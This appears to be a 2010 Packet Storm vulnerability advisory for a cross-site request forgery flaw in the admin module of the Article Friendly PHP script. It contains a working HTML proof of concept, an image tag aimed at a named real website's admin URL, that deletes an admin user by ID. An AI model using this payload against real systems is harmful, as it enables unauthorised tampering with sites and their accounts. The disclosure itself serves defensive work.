Article Friendly Cross Site Request Forgery

2010-02-25T00:00:00
ID PACKETSTORM:86669
Type packetstorm
Reporter Pratul Agrawal
Modified 2010-02-25T00:00:00

Description

                                        
                                            ` =======================================================================  
  
Article friendly CSRF Vulnerability  
  
=======================================================================  
  
by  
  
Pratul Agrawal  
  
  
  
# Vulnerability found in- Admin module  
  
# email Pratulag@yahoo.com  
  
# company aksitservices  
  
# Credit by Pratul Agrawal  
  
# Site p4ge http://www.articlefriendly.com/  
  
# Plateform php  
  
  
  
# Proof of concept #  
  
Targeted URL: http://www.familyfriendsphotos.com/admin/index.php?filename=adminlogin  
  
  
Script to delete the Admin user through Cross Site request forgery  
  
. ..................................................................................................................  
  
<html>  
  
<body>  
  
<img src=http://www.familyfriendsphotos.com/admin/index.php?filename=adminuser&a=3&adminid=[USER ID] />  
  
</body>  
  
</html>  
  
  
. ..................................................................................................................  
  
  
  
After execution refresh the page and u can see that user having giving ID get deleted automatically.  
  
  
#If you have any questions, comments, or concerns, feel free to contact me.  
`